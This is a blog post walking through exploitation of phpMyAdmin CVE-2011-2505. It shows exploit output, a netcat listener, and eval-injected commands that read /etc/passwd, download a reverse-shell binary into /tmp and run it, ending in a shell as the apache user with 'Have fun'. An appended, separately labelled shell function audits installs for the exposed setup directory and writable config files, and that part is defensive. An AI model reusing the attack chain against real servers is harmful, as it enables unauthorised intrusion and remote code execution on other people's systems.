Friday, 5 August 2011

phpMyAdmin Prior to and Multiple Remote Vulnerabilities

Bugtraq ID: 48563
Class: Input Validation Error
CVE: CVE-2011-2505
Remote: Yes
Local: No
Published: Jul 05 2011 12:00AM
Updated: Jul 26 2011 10:10PM

Hello all, this post will be a mix of an old post I already did, which was "Deface using EVAL() function", plus phpMyAdmin Prior to and
phpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities. Successful attacks can compromise the affected application and possibly the underlying computer. So, let's test that. We have two exploits available. With the first one, we will make the eval option available for us to execute remote commands on the target machine.

php exploit1.php
You should get something like this
[i] Running...
[*] Contacting server to retrive session cookie and token.
[i] Cookie:dkucqrelskbq2k8kd2ouive7rsb9t176
[i] Token:64d4cd9570888c981c127bdf47586d65
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
[*] Contacting server to make it save the injected code to a file.
[*] Contacting server to test if the injected code executes.
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!
[+] Use your browser to execute PHP code like this'test';

Great, that means it worked.
Now we apply what I explained before about EVAL().
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this on the attacking server:
nc -l -p 8080 -vvv

OK, now let's go back to the browser and upload our shell to the server."ls -la /");"cat /etc/passwd");"wget -P /tmp");"chmod 777 /tmp/airwolf_reverse_shell");"/tmp/airwolf_reverse_shell");

After you type this last line, go to the attacking server's shell to see whether the target server has connected back to you.
listening on [any] 8080 ... inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 53365

uid=48(apache) gid=48(apache) groups=48(apache)

Yep, as you can see, we got our shell on the server.
Have fun ;)
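The step the exploit reports as "make it save the injected code to a file" only works when the phpMyAdmin setup script is still present and the web-server user can write its generated configuration to disk. The following post-install check is an added example (not from this post or from the phpMyAdmin project); it takes the install root as its only argument and assumes the standard phpMyAdmin layout (a `setup/` directory, a `config/` directory used by the setup script, and `config.inc.php` at the root).

```shell
#!/bin/sh
# Added example: audit a phpMyAdmin install for the conditions the
# setup-script code-injection chain depends on.
# Usage: pma_audit /path/to/phpmyadmin
# Exit status: 0 = no findings, 1 = at least one finding.
pma_audit() {
  root="$1"
  findings=0

  # The setup script is what persists the session-injected configuration;
  # the phpMyAdmin docs recommend removing it once configuration is done.
  if [ -d "$root/setup" ]; then
    echo "FINDING: $root/setup exists; remove it after configuration"
    findings=$((findings + 1))
  fi

  # The setup script writes into config/; if that directory is writable,
  # injected code can be written to a file the application later includes.
  if [ -d "$root/config" ] && [ -w "$root/config" ]; then
    echo "FINDING: $root/config is writable; remove it or drop write permission"
    findings=$((findings + 1))
  fi

  # The live configuration must never be writable by the web-server user.
  if [ -f "$root/config.inc.php" ] && [ -w "$root/config.inc.php" ]; then
    echo "FINDING: $root/config.inc.php is writable by the current user"
    findings=$((findings + 1))
  fi

  [ "$findings" -eq 0 ]
}
```

Run it as the web-server account (the shell in the post lands as uid 48, apache), because the `-w` tests answer for the user running the script and root can write anywhere.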